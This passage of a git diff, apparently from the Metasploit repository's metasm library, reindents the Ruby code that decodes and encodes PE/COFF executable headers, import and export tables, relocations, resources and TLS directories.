0) + next if not s = @sections[sym.sec_nr-1] + s.encoded.add_export new_label(sym.name), sym.value + } + end + + # decodes a section content (allows simpler LoadedPE override) + def decode_section_body(s) + raw = EncodedData.align_size(s.rawsize, @optheader.file_align) + virt = EncodedData.align_size(s.virtsize, @optheader.sect_align) + virt = raw = s.rawsize if @header.size_opthdr == 0 + s.encoded = @encoded[s.rawaddr, [raw, virt].min] || EncodedData.new + s.encoded.virtsize = virt + end + + # decodes COFF export table from directory + # mark exported names as encoded.export + def decode_exports + if @directory['export_table'] and sect_at_rva(@directory['export_table'][0]) + @export = ExportDirectory.decode(self) + @export.exports.to_a.each { |e| + if e.name and sect_at_rva(e.target) + name = e.name + elsif e.ordinal and sect_at_rva(e.target) + name = "ord_#{@export.libname}_#{e.ordinal}" + end + e.target = curencoded.add_export new_label(name) if name + } + end + end + + # decodes COFF import tables from directory + # mark iat entries as encoded.export + def decode_imports + if @directory['import_table'] and sect_at_rva(@directory['import_table'][0]) + @imports = ImportDirectory.decode_all(self) + iatlen = @bitsize/8 + @imports.each { |id| + if sect_at_rva(id.iat_p) + ptr = curencoded.ptr + id.imports.each { |i| + if i.name + name = new_label i.name + elsif i.ordinal + name = new_label "ord_#{id.libname}_#{i.ordinal}" + end + if name + i.target ||= name + r = Metasm::Relocation.new(Expression[name], "u#@bitsize".to_sym, @endianness) + curencoded.reloc[ptr] = r + curencoded.add_export new_label('iat_'+name), ptr, true + end + ptr += iatlen + } + end + } + end + end + + # decodes resources from directory + def decode_resources + if @directory['resource_table'] and sect_at_rva(@directory['resource_table'][0]) + @resource = ResourceDirectory.decode(self) + end + end + + # decode the VERSION information from the resources (file version, os, copyright etc) + def decode_version(lang=0x409) + decode_resources if not resource + resource.decode_version(self, lang) + end + + # decodes certificate table + def decode_certificates + if ct = @directory['certificate_table'] + @certificates = [] + @cursection = self + @encoded.ptr = ct[0] + off_end = ct[0]+ct[1] + while @encoded.ptr < off_end + certlen = decode_word + certrev = decode_half + certtype = decode_half + certdat = @encoded.read(certlen) + @certificates << [certrev, certtype, certdat] + end + end + end + + # decode the COM Cor20 header + def decode_com + if @directory['com_runtime'] and sect_at_rva(@directory['com_runtime'][0]) + @com_header = Cor20Header.decode(self) + if sect_at_rva(@com_header.entrypoint) + curencoded.add_export new_label('com_entrypoint') + end + @com_header.decode_all(self) + end + end + + # decode COFF relocation tables from directory + def decode_relocs + if @directory['base_relocation_table'] and sect_at_rva(@directory['base_relocation_table'][0]) + end_ptr = curencoded.ptr + @directory['base_relocation_table'][1] + @relocations = [] + while curencoded.ptr < end_ptr + @relocations << RelocationTable.decode(self) + end + + # interpret as EncodedData relocations + relocfunc = ('decode_reloc_' << @header.machine.downcase).to_sym + if not respond_to? relocfunc + puts "W: COFF: unsupported relocs for architecture #{@header.machine}" if $VERBOSE + return + end + @relocations.each { |rt| + rt.relocs.each { |r| + if s = sect_at_rva(rt.base_addr + r.offset) + e, p = s.encoded, s.encoded.ptr + rel = send(relocfunc, r) + e.reloc[p] = rel if rel + end + } + } + end + end + + # decodes an I386 COFF relocation pointing to encoded.ptr + def decode_reloc_i386(r) + case r.type + when 'ABSOLUTE' + when 'HIGHLOW' + addr = decode_word + if s = sect_at_va(addr) + label = label_at(s.encoded, s.encoded.ptr, "xref_#{Expression[addr]}") + Metasm::Relocation.new(Expression[label], :u32, @endianness) + end + when 'DIR64' + addr = decode_xword + if s = sect_at_va(addr) + label = label_at(s.encoded, s.encoded.ptr, "xref_#{Expression[addr]}") + Metasm::Relocation.new(Expression[label], :u64, @endianness) + end + else puts "W: COFF: Unsupported i386 relocation #{r.inspect}" if $VERBOSE + end + end + + def decode_debug + if dd = @directory['debug'] and sect_at_rva(dd[0]) + @debug = [] + p0 = curencoded.ptr + while curencoded.ptr < p0 + dd[1] + @debug << DebugDirectory.decode(self) + end + @debug.each { |dbg| dbg.decode_inner(self) } + end + end + + # decode TLS directory, including tls callback table + def decode_tls + if @directory['tls_table'] and sect_at_rva(@directory['tls_table'][0]) + @tls = TLSDirectory.decode(self) + if s = sect_at_va(@tls.callback_p) + s.encoded.add_export 'tls_callback_table' + @tls.callbacks.each_with_index { |cb, i| + @tls.callbacks[i] = curencoded.add_export "tls_callback_#{i}" if sect_at_rva(cb) + } + end + end + end + + def decode_loadconfig + if lc = @directory['load_config'] and sect_at_rva(lc[0]) + @loadconfig = LoadConfig.decode(self) + end + end + + def decode_delayimports + if di = @directory['delay_import_table'] and sect_at_rva(di[0]) + @delayimports = DelayImportDirectory.decode_all(self) + end + end + + + # decodes a COFF file (headers/exports/imports/relocs/sections) + # starts at encoded.ptr + def decode + decode_header + decode_exports + decode_imports + decode_resources + decode_certificates + decode_debug + decode_tls + decode_loadconfig + decode_delayimports + decode_com + decode_relocs unless nodecode_relocs or ENV['METASM_NODECODE_RELOCS'] # decode relocs last + end + + # returns a metasm CPU object corresponding to +header.machine+ + def cpu_from_headers + case @header.machine + when 'I386'; Ia32.new + when 'AMD64'; X86_64.new + when 'R4000'; MIPS.new(:little) + else raise "unknown cpu #{@header.machine}" + end + end + + # returns an array including the PE entrypoint and the exported functions entrypoints + # TODO filter out exported data, include safeseh ? + def get_default_entrypoints + ep = [] + ep.concat @tls.callbacks.to_a if tls + ep << (@optheader.image_base + label_rva(@optheader.entrypoint)) + @export.exports.to_a.each { |e| + next if e.forwarder_lib or not e.target + ep << (@optheader.image_base + label_rva(e.target)) + } if export + ep + end + + def dump_section_header(addr, edata) + s = @sections.find { |s_| s_.virtaddr == addr-@optheader.image_base } + s ? "\n.section #{s.name.inspect} base=#{Expression[addr]}" : + addr == @optheader.image_base ? "// exe header at #{Expression[addr]}" : super(addr, edata) + end + + # returns an array of [name, addr, length, info] + def section_info + [['header', @optheader.image_base, @optheader.headers_size, nil]] + + @sections.map { |s| + [s.name, @optheader.image_base + s.virtaddr, s.virtsize, s.characteristics.join(',')] + } + end end class COFFArchive - class Member - def decode(ar) - @offset = ar.encoded.ptr - - super(ar) - raise 'bad member header' + self.inspect if @eoh != "`\n" - - @name.strip! - @date = @date.to_i - @uid = @uid.to_i - @gid = @gid.to_i - @mode = @mode.to_i(8) - @size = @size.to_i - - @encoded = ar.encoded[ar.encoded.ptr, @size] - ar.encoded.ptr += @size - ar.encoded.ptr += 1 if @size & 1 == 1 - end - - def decode_half ; @encoded.decode_imm(:u16, :big) end - def decode_word ; @encoded.decode_imm(:u32, :big) end - - def exe; AutoExe.decode(@encoded) ; end - end - - def decode_half(edata = @encoded) ; edata.decode_imm(:u16, :little) end - def decode_word(edata = @encoded) ; edata.decode_imm(:u32, :little) end - def decode_strz(edata = @encoded) - i = edata.data.index(?\0, edata.ptr) || edata.data.index(?\n, edata.ptr) || (edata.length+1) - edata.read(i+1-edata.ptr).chop - end - - def decode_first_linker(m) - offsets = [] - names = [] - m.encoded.ptr = 0 - numsym = m.decode_word - numsym.times { offsets << m.decode_word } - numsym.times { names << decode_strz(m.encoded) } - - # names[42] is found in object at file offset offsets[42] - # offsets are sorted by object index (all syms from 1st object, then 2nd etc) - - @first_linker = names.zip(offsets) #.inject({}) { |h, (n, o)| h.update n => o } - end - - def decode_second_linker(m) - names = [] - mboffsets = [] - indices = [] - m = @members[1] - m.encoded.ptr = 0 - nummb = decode_word(m.encoded) - nummb.times { mboffsets << decode_word(m.encoded) } - numsym = decode_word(m.encoded) - numsym.times { indices << decode_half(m.encoded) } - numsym.times { names << decode_strz(m.encoded) } - - # names[42] is found in object at file offset mboffsets[indices[42]] - # symbols sorted by symbol name (supposed to be more efficient, but no index into string table...) - - #names.zip(indices).inject({}) { |h, (n, i)| h.update n => mboffsets[i] } - @second_linker = [names, mboffsets, indices] - end - - def decode_longnames(m) - @longnames = m.encoded - end - - # set real name to archive members - # look it up in the name table member if needed, or just remove the trailing / - def fixup_names - @members.each { |m| - case m.name - when '/' - when '//' - when /^\/(\d+)/ - @longnames.ptr = $1.to_i - m.name = decode_strz(@longnames).chomp("/") - else m.name.chomp! "/" - end - } - end - - def decode - @encoded.ptr = 0 - @signature = @encoded.read(8) - raise InvalidExeFormat, "Invalid COFF Archive signature #{@signature.inspect}" if @signature != "!\n" - @members = [] - while @encoded.ptr < @encoded.virtsize - @members << Member.decode(self) - end - @members.each { |m| - case m.name - when '/'; @first_linker ? decode_second_linker(m) : decode_first_linker(m) - when '//'; decode_longnames(m) - else break - end - } - fixup_names - end + class Member + def decode(ar) + @offset = ar.encoded.ptr + + super(ar) + raise 'bad member header' + self.inspect if @eoh != "`\n" + + @name.strip! + @date = @date.to_i + @uid = @uid.to_i + @gid = @gid.to_i + @mode = @mode.to_i(8) + @size = @size.to_i + + @encoded = ar.encoded[ar.encoded.ptr, @size] + ar.encoded.ptr += @size + ar.encoded.ptr += 1 if @size & 1 == 1 + end + + def decode_half ; @encoded.decode_imm(:u16, :big) end + def decode_word ; @encoded.decode_imm(:u32, :big) end + + def exe; AutoExe.decode(@encoded) ; end + end + + def decode_half(edata = @encoded) ; edata.decode_imm(:u16, :little) end + def decode_word(edata = @encoded) ; edata.decode_imm(:u32, :little) end + def decode_strz(edata = @encoded) + i = edata.data.index(?\0, edata.ptr) || edata.data.index(?\n, edata.ptr) || (edata.length+1) + edata.read(i+1-edata.ptr).chop + end + + def decode_first_linker(m) + offsets = [] + names = [] + m.encoded.ptr = 0 + numsym = m.decode_word + numsym.times { offsets << m.decode_word } + numsym.times { names << decode_strz(m.encoded) } + + # names[42] is found in object at file offset offsets[42] + # offsets are sorted by object index (all syms from 1st object, then 2nd etc) + + @first_linker = names.zip(offsets) #.inject({}) { |h, (n, o)| h.update n => o } + end + + def decode_second_linker(m) + names = [] + mboffsets = [] + indices = [] + m = @members[1] + m.encoded.ptr = 0 + nummb = decode_word(m.encoded) + nummb.times { mboffsets << decode_word(m.encoded) } + numsym = decode_word(m.encoded) + numsym.times { indices << decode_half(m.encoded) } + numsym.times { names << decode_strz(m.encoded) } + + # names[42] is found in object at file offset mboffsets[indices[42]] + # symbols sorted by symbol name (supposed to be more efficient, but no index into string table...) + + #names.zip(indices).inject({}) { |h, (n, i)| h.update n => mboffsets[i] } + @second_linker = [names, mboffsets, indices] + end + + def decode_longnames(m) + @longnames = m.encoded + end + + # set real name to archive members + # look it up in the name table member if needed, or just remove the trailing / + def fixup_names + @members.each { |m| + case m.name + when '/' + when '//' + when /^\/(\d+)/ + @longnames.ptr = $1.to_i + m.name = decode_strz(@longnames).chomp("/") + else m.name.chomp! "/" + end + } + end + + def decode + @encoded.ptr = 0 + @signature = @encoded.read(8) + raise InvalidExeFormat, "Invalid COFF Archive signature #{@signature.inspect}" if @signature != "!\n" + @members = [] + while @encoded.ptr < @encoded.virtsize + @members << Member.decode(self) + end + @members.each { |m| + case m.name + when '/'; @first_linker ? decode_second_linker(m) : decode_first_linker(m) + when '//'; decode_longnames(m) + else break + end + } + fixup_names + end end end diff --git a/lib/metasm/metasm/exe_format/coff_encode.rb b/lib/metasm/metasm/exe_format/coff_encode.rb index a9206d80f1c63..d317884bebda9 100644 --- a/lib/metasm/metasm/exe_format/coff_encode.rb +++ b/lib/metasm/metasm/exe_format/coff_encode.rb @@ -9,1070 +9,1070 @@ module Metasm class COFF - class OptionalHeader - # encodes an Optional header and the directories - def encode(coff) - opth = super(coff) - - DIRECTORIES[0, @numrva].each { |d| - if d = coff.directory[d] - d = d.dup - d[0] = Expression[d[0], :-, coff.label_at(coff.encoded, 0)] if d[0].kind_of?(::String) - else - d = [0, 0] - end - opth << coff.encode_word(d[0]) << coff.encode_word(d[1]) - } - - opth - end - - # find good default values for optheader members, based on coff.sections - def set_default_values(coff) - @signature ||= (coff.bitsize == 64 ? 'PE+' : 'PE') - @link_ver_maj ||= 1 - @link_ver_min ||= 0 - @sect_align ||= 0x1000 - align = lambda { |sz| EncodedData.align_size(sz, @sect_align) } - @code_size ||= coff.sections.find_all { |s| s.characteristics.include? 'CONTAINS_CODE' }.inject(0) { |sum, s| sum + align[s.virtsize] } - @data_size ||= coff.sections.find_all { |s| s.characteristics.include? 'CONTAINS_DATA' }.inject(0) { |sum, s| sum + align[s.virtsize] } - @udata_size ||= coff.sections.find_all { |s| s.characteristics.include? 'CONTAINS_UDATA' }.inject(0) { |sum, s| sum + align[s.virtsize] } - @entrypoint = Expression[@entrypoint, :-, coff.label_at(coff.encoded, 0)] if entrypoint and not @entrypoint.kind_of?(::Integer) - tmp = coff.sections.find { |s| s.characteristics.include? 'CONTAINS_CODE' } - @base_of_code ||= (tmp ? Expression[coff.label_at(tmp.encoded, 0), :-, coff.label_at(coff.encoded, 0)] : 0) - tmp = coff.sections.find { |s| s.characteristics.include? 'CONTAINS_DATA' } - @base_of_data ||= (tmp ? Expression[coff.label_at(tmp.encoded, 0), :-, coff.label_at(coff.encoded, 0)] : 0) - @file_align ||= 0x200 - @os_ver_maj ||= 4 - @subsys_maj ||= 4 - @stack_reserve||= 0x100000 - @stack_commit ||= 0x1000 - @heap_reserve ||= 0x100000 - @heap_commit ||= 0x1000 - @numrva ||= DIRECTORIES.length - - super(coff) - end - end - - class Section - # find good default values for section header members, defines rawaddr/rawsize as new_label for later fixup - def set_default_values(coff) - @name ||= '' - @virtsize ||= @encoded.virtsize - @virtaddr ||= Expression[coff.label_at(@encoded, 0, 'sect_start'), :-, coff.label_at(coff.encoded, 0)] - @rawsize ||= coff.new_label('sect_rawsize') - @rawaddr ||= coff.new_label('sect_rawaddr') - - super(coff) - end - end - - class ExportDirectory - # encodes an export directory - def encode(coff) - edata = {} - %w[edata addrtable namptable ord_table libname nametable].each { |name| - edata[name] = EncodedData.new - } - label = lambda { |n| coff.label_at(edata[n], 0, n) } - rva = lambda { |n| Expression[label[n], :-, coff.label_at(coff.encoded, 0)] } - rva_end = lambda { |n| Expression[[label[n], :-, coff.label_at(coff.encoded, 0)], :+, edata[n].virtsize] } - - # ordinal base: smallest number > 1 to honor ordinals, minimize gaps - olist = @exports.map { |e| e.ordinal }.compact - # start with lowest ordinal, substract all exports unused to fill ordinal sequence gaps - omin = olist.min.to_i - gaps = olist.empty? ? 0 : olist.max+1 - olist.min - olist.length - noord = @exports.length - olist.length - @ordinal_base ||= [omin - (noord - gaps), 1].max - - @libname_p = rva['libname'] - @num_exports = [@exports.length, @exports.map { |e| e.ordinal }.compact.max.to_i - @ordinal_base].max - @num_names = @exports.find_all { |e| e.name }.length - @func_p = rva['addrtable'] - @names_p = rva['namptable'] - @ord_p = rva['ord_table'] - - edata['edata'] << super(coff) - - edata['libname'] << @libname << 0 - - elist = @exports.find_all { |e| e.name and not e.ordinal }.sort_by { |e| e.name } - @exports.find_all { |e| e.ordinal }.sort_by { |e| e.ordinal }.each { |e| elist.insert(e.ordinal-@ordinal_base, e) } - elist.each { |e| - if not e - # export by ordinal with gaps - # XXX test this value with the windows loader - edata['addrtable'] << coff.encode_word(0xffff_ffff) - next - end - if e.forwarder_lib - edata['addrtable'] << coff.encode_word(rva_end['nametable']) - edata['nametable'] << e.forwarder_lib << ?. << - if not e.forwarder_name - "##{e.forwarder_ordinal}" - else - e.forwarder_name - end << 0 - else - edata['addrtable'] << coff.encode_word(Expression[e.target, :-, coff.label_at(coff.encoded, 0)]) - end - if e.name - edata['ord_table'] << coff.encode_half(edata['addrtable'].virtsize/4 - 1) - edata['namptable'] << coff.encode_word(rva_end['nametable']) - edata['nametable'] << e.name << 0 - end - } - - # sorted by alignment directives - %w[edata addrtable namptable ord_table libname nametable].inject(EncodedData.new) { |ed, name| ed << edata[name] } - end - - def set_default_values(coff) - @timestamp ||= Time.now.to_i - @libname ||= 'metalib' - @ordinal_base ||= 1 - - super(coff) - end - end - - class ImportDirectory - # encodes all import directories + iat - def self.encode(coff, ary) - edata = { 'iat' => [] } - %w[idata ilt nametable].each { |name| edata[name] = EncodedData.new } - - ary.each { |i| i.encode(coff, edata) } - - it = edata['idata'] << - coff.encode_word(0) << - coff.encode_word(0) << - coff.encode_word(0) << - coff.encode_word(0) << - coff.encode_word(0) << - edata['ilt'] << - edata['nametable'] - - iat = edata['iat'] # why not fragmented ? - - [it, iat] - end - - # encodes an import directory + iat + names in the edata hash received as arg - def encode(coff, edata) - edata['iat'] << EncodedData.new - # edata['ilt'] = edata['iat'] - label = lambda { |n| coff.label_at(edata[n], 0, n) } - rva = lambda { |n| Expression[label[n], :-, coff.label_at(coff.encoded, 0)] } - rva_end = lambda { |n| Expression[[label[n], :-, coff.label_at(coff.encoded, 0)], :+, edata[n].virtsize] } - - @libname_p = rva_end['nametable'] - @ilt_p = rva_end['ilt'] - @iat_p ||= Expression[coff.label_at(edata['iat'].last, 0, 'iat'), :-, coff.label_at(coff.encoded, 0)] - edata['idata'] << super(coff) - - edata['nametable'] << @libname << 0 - - ord_mask = 1 << (coff.bitsize - 1) - @imports.each { |i| - edata['iat'].last.add_export i.target, edata['iat'].last.virtsize if i.target - if i.ordinal - ptr = coff.encode_xword(Expression[i.ordinal, :|, ord_mask]) - else - edata['nametable'].align 2 - ptr = coff.encode_xword(rva_end['nametable']) - edata['nametable'] << coff.encode_half(i.hint || 0) << i.name << 0 - end - edata['ilt'] << ptr - edata['iat'].last << ptr - } - edata['ilt'] << coff.encode_xword(0) - edata['iat'].last << coff.encode_xword(0) - end - end - - class TLSDirectory - def encode(coff) - cblist = EncodedData.new - @callback_p = coff.label_at(cblist, 0, 'callback_p') - @callbacks.to_a.each { |cb| - cblist << coff.encode_xword(cb) - } - cblist << coff.encode_xword(0) - - dir = super(coff) - - [dir, cblist] - end - - def set_default_values(coff) - @start_va ||= 0 - @end_va ||= @start_va - - super(coff) - end - end - - class RelocationTable - # encodes a COFF relocation table - def encode(coff) - rel = super(coff) << coff.encode_word(8 + 2*@relocs.length) - @relocs.each { |r| rel << r.encode(coff) } - rel - end - - def set_default_values(coff) - # @base_addr is an rva - @base_addr = Expression[@base_addr, :-, coff.label_at(coff.encoded, 0)] if @base_addr.kind_of?(::String) - - # align relocation table size - if @relocs.length % 2 != 0 - r = Relocation.new - r.type = 0 - r.offset = 0 - @relocs << r - end - - super(coff) - end - end - - class ResourceDirectory - # compiles ressource directories - def encode(coff, edata = nil) - if not edata - # init recursion - edata = {} - subtables = %w[table names dataentries data] - subtables.each { |n| edata[n] = EncodedData.new } - encode(coff, edata) - return subtables.inject(EncodedData.new) { |sum, n| sum << edata[n] } - end - - label = lambda { |n| coff.label_at(edata[n], 0, n) } - # data 'rva' are real rvas (from start of COFF) - rva_end = lambda { |n| Expression[[label[n], :-, coff.label_at(coff.encoded, 0)], :+, edata[n].virtsize] } - # names and table 'rva' are relative to the beginning of the resource directory - off_end = lambda { |n| Expression[[label[n], :-, coff.label_at(edata['table'], 0)], :+, edata[n].virtsize] } - - # build name_w if needed - @entries.each { |e| e.name_w = e.name.unpack('C*').pack('v*') if e.name and not e.name_w } - - # fixup forward references to us, as subdir - edata['table'].fixup @curoff_label => edata['table'].virtsize if defined? @curoff_label - - @nr_names = @entries.find_all { |e| e.name_w }.length - @nr_id = @entries.find_all { |e| e.id }.length - edata['table'] << super(coff) - - # encode entries, sorted by names nocase, then id - @entries.sort_by { |e| e.name_w ? [0, e.name_w.downcase] : [1, e.id] }.each { |e| - if e.name_w - edata['table'] << coff.encode_word(Expression[off_end['names'], :|, 1 << 31]) - edata['names'] << coff.encode_half(e.name_w.length/2) << e.name_w - else - edata['table'] << coff.encode_word(e.id) - end - - if e.subdir - e.subdir.curoff_label = coff.new_label('rsrc_curoff') - edata['table'] << coff.encode_word(Expression[e.subdir.curoff_label, :|, 1 << 31]) - else # data entry - edata['table'] << coff.encode_word(off_end['dataentries']) - - edata['dataentries'] << - coff.encode_word(rva_end['data']) << - coff.encode_word(e.data.length) << - coff.encode_word(e.codepage || 0) << - coff.encode_word(e.reserved || 0) - - edata['data'] << e.data - end - } - - # recurse - @entries.find_all { |e| e.subdir }.each { |e| e.subdir.encode(coff, edata) } - end - end - - - # computes the checksum for a given COFF file - # may not work with overlapping sections - def self.checksum(str, endianness = :little) - coff = load str - coff.endianness = endianness - coff.decode_header - coff.encoded.ptr = 0 - - flen = 0 - csum = 0 - # negate old checksum - oldcs = coff.encode_word(coff.optheader.checksum) - oldcs.ptr = 0 - csum -= coff.decode_half(oldcs) - csum -= coff.decode_half(oldcs) - - # checksum header - raw = coff.encoded.read(coff.optheader.headers_size) - flen += coff.optheader.headers_size - - coff.sections.each { |s| - coff.encoded.ptr = s.rawaddr - raw << coff.encoded.read(s.rawsize) - flen += s.rawsize - } - raw.unpack(endianness == :little ? 'v*' : 'n*').each { |s| - csum += s - csum = (csum & 0xffff) + (csum >> 16) if (csum >> 16) > 0 - } - csum + flen - end - - - def encode_byte(w) Expression[w].encode(:u8, @endianness, (caller if $DEBUG)) end - def encode_half(w) Expression[w].encode(:u16, @endianness, (caller if $DEBUG)) end - def encode_word(w) Expression[w].encode(:u32, @endianness, (caller if $DEBUG)) end - def encode_xword(w) Expression[w].encode((@bitsize == 32 ? :u32 : :u64), @endianness, (caller if $DEBUG)) end - - - # adds a new compiler-generated section - def encode_append_section(s) - if (s.virtsize || s.encoded.virtsize) < 4096 - # find section to merge with - # XXX check following sections for hardcoded base address ? - - char = s.characteristics.dup - secs = @sections.dup - # do not merge non-discardable in discardable - if not char.delete 'MEM_DISCARDABLE' - secs.delete_if { |ss| ss.characteristics.include? 'MEM_DISCARDABLE' } - end - # do not merge shared w/ non-shared - if char.delete 'MEM_SHARED' - secs.delete_if { |ss| not ss.characteristics.include? 'MEM_SHARED' } - else - secs.delete_if { |ss| ss.characteristics.include? 'MEM_SHARED' } - end - secs.delete_if { |ss| ss.virtsize.kind_of?(::Integer) or ss.rawsize.kind_of?(::Integer) or secs[secs.index(ss)+1..-1].find { |ss_| ss_.virtaddr.kind_of?(::Integer) } } - - # try to find superset of characteristics - if target = secs.find { |ss| (ss.characteristics & char) == char } - target.encoded.align 8 - puts "PE: merging #{s.name} in #{target.name} (#{target.encoded.virtsize})" if $DEBUG - s.encoded = target.encoded << s.encoded - else - @sections << s - end - else - @sections << s - end - end - - # encodes the export table as a new section, updates directory['export_table'] - def encode_exports - edata = @export.encode self - - # must include name tables (for forwarders) - @directory['export_table'] = [label_at(edata, 0, 'export_table'), edata.virtsize] - - s = Section.new - s.name = '.edata' - s.encoded = edata - s.characteristics = %w[MEM_READ] - encode_append_section s - end - - # encodes the import tables as a new section, updates directory['import_table'] and directory['iat'] - def encode_imports - idata, iat = ImportDirectory.encode(self, @imports) - - @directory['import_table'] = [label_at(idata, 0, 'idata'), idata.virtsize] - - s = Section.new - s.name = '.idata' - s.encoded = idata - s.characteristics = %w[MEM_READ MEM_WRITE MEM_DISCARDABLE] - encode_append_section s - - if @imports.first and @imports.first.iat_p.kind_of? Integer - ordiat = @imports.zip(iat).sort_by { |id, it| id.iat_p.kind_of?(Integer) ? id.iat_p : 1<<65 }.map { |id, it| it } - else - ordiat = iat - end - - @directory['iat'] = [label_at(ordiat.first, 0, 'iat'), - Expression[label_at(ordiat.last, ordiat.last.virtsize, 'iat_end'), :-, label_at(ordiat.first, 0)]] if not ordiat.empty? - - iat_s = nil - - plt = Section.new - plt.name = '.plt' - plt.encoded = EncodedData.new - plt.characteristics = %w[MEM_READ MEM_EXECUTE] - - @imports.zip(iat) { |id, it| - if id.iat_p.kind_of? Integer and s = @sections.find { |s_| s_.virtaddr <= id.iat_p and s_.virtaddr + (s_.virtsize || s_.encoded.virtsize) > id.iat_p } - id.iat = it # will be fixed up after encode_section - else - # XXX should not be mixed (for @directory['iat'][1]) - if not iat_s - iat_s = Section.new - iat_s.name = '.iat' - iat_s.encoded = EncodedData.new - iat_s.characteristics = %w[MEM_READ MEM_WRITE] - encode_append_section iat_s - end - iat_s.encoded << it - end - - id.imports.each { |i| - if i.thunk - arch_encode_thunk(plt.encoded, i) - end - } - } - - encode_append_section plt if not plt.encoded.empty? - end - - # encodes a thunk to imported function - def arch_encode_thunk(edata, import) - case @cpu.shortname - when 'ia32', 'x64' - shellcode = lambda { |c| Shellcode.new(@cpu).share_namespace(self).assemble(c).encoded } - if @cpu.generate_PIC - if @cpu.shortname == 'x64' - edata << shellcode["#{import.thunk}: jmp [rip-$_+#{import.target}]"] - return - end - # sections starts with a helper function that returns the address of metasm_intern_geteip in eax (PIC) - if not @sections.find { |s| s.encoded and s.encoded.export['metasm_intern_geteip'] } and edata.empty? - edata << shellcode["metasm_intern_geteip: call 42f\n42:\npop eax\nsub eax, 42b-metasm_intern_geteip\nret"] - end - edata << shellcode["#{import.thunk}: call metasm_intern_geteip\njmp [eax+#{import.target}-metasm_intern_geteip]"] - else - edata << shellcode["#{import.thunk}: jmp [#{import.target}]"] - end - else raise EncodeError, 'E: COFF: encode import thunk: unsupported architecture' - end - end - - def encode_tls - dir, cbtable = @tls.encode(self) - @directory['tls_table'] = [label_at(dir, 0, 'tls_table'), dir.virtsize] - - s = Section.new - s.name = '.tls' - s.encoded = EncodedData.new << dir << cbtable - s.characteristics = %w[MEM_READ MEM_WRITE] - encode_append_section s - end - - # encodes relocation tables in a new section .reloc, updates @directory['base_relocation_table'] - def encode_relocs - if @relocations.empty? - rt = RelocationTable.new - rt.base_addr = 0 - rt.relocs = [] - @relocations << rt - end - relocs = @relocations.inject(EncodedData.new) { |edata, rt_| edata << rt_.encode(self) } - - @directory['base_relocation_table'] = [label_at(relocs, 0, 'reloc_table'), relocs.virtsize] - - s = Section.new - s.name = '.reloc' - s.encoded = relocs - s.characteristics = %w[MEM_READ MEM_DISCARDABLE] - encode_append_section s - end - - # creates the @relocations from sections.encoded.reloc - def create_relocation_tables - @relocations = [] - - # create a fake binding with all exports, to find only-image_base-dependant relocs targets - # not foolproof, but works in standard cases - startaddr = curaddr = label_at(@encoded, 0, 'coff_start') - binding = {} - @sections.each { |s| - binding.update s.encoded.binding(curaddr) - curaddr = Expression[curaddr, :+, s.encoded.virtsize] - } - - # for each section.encoded, make as many RelocationTables as needed - @sections.each { |s| - - # rt.base_addr temporarily holds the offset from section_start, and is fixed up to rva before '@reloc << rt' - rt = RelocationTable.new - - s.encoded.reloc.each { |off, rel| - # check that the relocation looks like "program_start + integer" when bound using the fake binding - # XXX allow :i32 etc - if rel.endianness == @endianness and [:u32, :a32, :u64, :a64].include?(rel.type) and - rel.target.bind(binding).reduce.kind_of?(Expression) and - Expression[rel.target, :-, startaddr].bind(binding).reduce.kind_of?(::Integer) - # winner ! - - # build relocation - r = RelocationTable::Relocation.new - r.offset = off & 0xfff - r.type = { :u32 => 'HIGHLOW', :u64 => 'DIR64', :a32 => 'HIGHLOW', :a64 => 'DIR64' }[rel.type] - - # check if we need to start a new relocation table - if rt.base_addr and (rt.base_addr & ~0xfff) != (off & ~0xfff) - rt.base_addr = Expression[[label_at(s.encoded, 0, 'sect_start'), :-, startaddr], :+, rt.base_addr] - @relocations << rt - rt = RelocationTable.new - end - - # initialize reloc table base address if needed - if not rt.base_addr - rt.base_addr = off & ~0xfff - end - - (rt.relocs ||= []) << r - elsif $DEBUG and not rel.target.bind(binding).reduce.kind_of?(Integer) - puts "W: COFF: Ignoring weird relocation #{rel.inspect} when building relocation tables" - end - } - - if rt and rt.relocs - rt.base_addr = Expression[[label_at(s.encoded, 0, 'sect_start'), :-, startaddr], :+, rt.base_addr] - @relocations << rt - end - } - end - - def encode_resource - res = @resource.encode self - - @directory['resource_table'] = [label_at(res, 0, 'resource_table'), res.virtsize] - - s = Section.new - s.name = '.rsrc' - s.encoded = res - s.characteristics = %w[MEM_READ] - encode_append_section s - end - - # initialize the header from target/cpu/etc, target in ['exe' 'dll' 'kmod' 'obj'] - def pre_encode_header(target = 'exe', want_relocs=true) - target = {:bin => 'exe', :lib => 'dll', :obj => 'obj', 'sys' => 'kmod', 'drv' => 'kmod'}.fetch(target, target) - - @header.machine ||= case @cpu.shortname - when 'x64'; 'AMD64' - when 'ia32'; 'I386' - end - @optheader.signature ||= case @cpu.size - when 32; 'PE' - when 64; 'PE+' - end - @bitsize = (@optheader.signature == 'PE+' ? 64 : 32) - - # setup header flags - tmp = %w[LINE_NUMS_STRIPPED LOCAL_SYMS_STRIPPED DEBUG_STRIPPED] + - case target - when 'exe'; %w[EXECUTABLE_IMAGE] - when 'dll'; %w[EXECUTABLE_IMAGE DLL] - when 'kmod'; %w[EXECUTABLE_IMAGE] - when 'obj'; [] - end - if @cpu.size == 32 - tmp << 'x32BIT_MACHINE' - else - tmp << 'LARGE_ADDRESS_AWARE' - end - tmp << 'RELOCS_STRIPPED' if not want_relocs - @header.characteristics ||= tmp - - @optheader.subsystem ||= case target - when 'exe', 'dll'; 'WINDOWS_GUI' - when 'kmod'; 'NATIVE' - end - - tmp = [] - tmp << 'NX_COMPAT' - tmp << 'DYNAMIC_BASE' if want_relocs - @optheader.dll_characts ||= tmp - end - - # resets the values in the header that may have been - # modified by your script (eg section count, size, imagesize, etc) - # call this whenever you decode a file, modify it, and want to reencode it later - def invalidate_header - # set those values to nil, they will be - # recomputed during encode_header - [:code_size, :data_size, :udata_size, :base_of_code, :base_of_data, - :sect_align, :file_align, :image_size, :headers_size, :checksum].each { |m| @optheader.send("#{m}=", nil) } - [:num_sect, :ptr_sym, :num_sym, :size_opthdr].each { |m| @header.send("#{m}=", nil) } - end - - # appends the header/optheader/directories/section table to @encoded - def encode_header - # encode section table, add CONTAINS_* flags from other characteristics flags - s_table = EncodedData.new - - @sections.each { |s| - if s.characteristics.kind_of? Array and s.characteristics.include? 'MEM_READ' - if s.characteristics.include? 'MEM_EXECUTE' - s.characteristics |= ['CONTAINS_CODE'] - elsif s.encoded - if s.encoded.rawsize == 0 - s.characteristics |= ['CONTAINS_UDATA'] - else - s.characteristics |= ['CONTAINS_DATA'] - end - end - end - s.rawaddr = nil if 